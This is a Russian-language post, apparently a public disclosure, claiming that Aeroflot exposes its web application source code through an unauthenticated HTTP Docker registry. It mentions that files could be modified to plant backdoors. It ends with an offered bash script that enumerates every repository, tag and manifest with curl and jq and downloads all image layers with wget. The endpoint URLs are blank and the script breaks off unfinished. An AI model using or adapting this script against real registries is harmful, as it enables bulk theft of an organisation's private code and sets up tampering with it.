Халатность авиакомпании "Аэрофлота" в защите данных.

На просторах интернета возможно найти много интересных данных, которые никак не защищаются в силу неграмотности или беспечности. Таким поведением страдают даже крупные корпорации. Одна из таких - авиакомпания "Аэрофлот". Компания хранит исходные коды всех своих веб-приложений в публичном доступе без какой либо аутентификации и шифрования.

Для хранения исходников используется HTTP Docker. API докера доступно по адресу "".

Для получения списка всех репозитариев достаточно выполнить запрос "".

Все репозитария никак не защищены и аутентификация отсутствует.

Получается годами весь исходный код всех внешних приложений авиакомпании "Аэрофлот" доступен публично и любой злоумышленник может их легко заполучить. Поэтому не удивительно, что данную корпорацию часто атакуют и что закономерно - удачно. Через API так же возможно модифицировать файлы, что позволит внедрить свои закладки. Представляете масштаб проблемы, если этого не заметят программисты?

Возможно после этой публикации корпорация обратит внимание на свои проблемы и займется обеспечение информационной безопасности.

Так же предоставлю скрипт, которым можно выгрузить все данные:

for catalog in `curl "" -s -k|jq '.repositories'|awk -F "\"" {'print $2'}`; do

    mkdir /path/to/dir/`echo $catalog`/

    # Get list versions
    for revision in `curl -s -k$catalog/tags/list|jq '.tags[]'|awk -F "\"" {'print $2'}`; do

	mkdir /path/to/dir/`echo $catalog`/`echo $revision`/

	#Get lists blob for download file
	for blob in `curl -s -vv -k$catalog/manifests/$revision|jq '.fsLayers[] .blobSum'|awk -F "\"" {'print $2'}|sort|uniq`; do

	    wget "$catalog/blobs/$blob" -O /path/to/dir/$catalog/$revision/`echo $blob|awk -F ":" {'print $2'}`.tar.gz



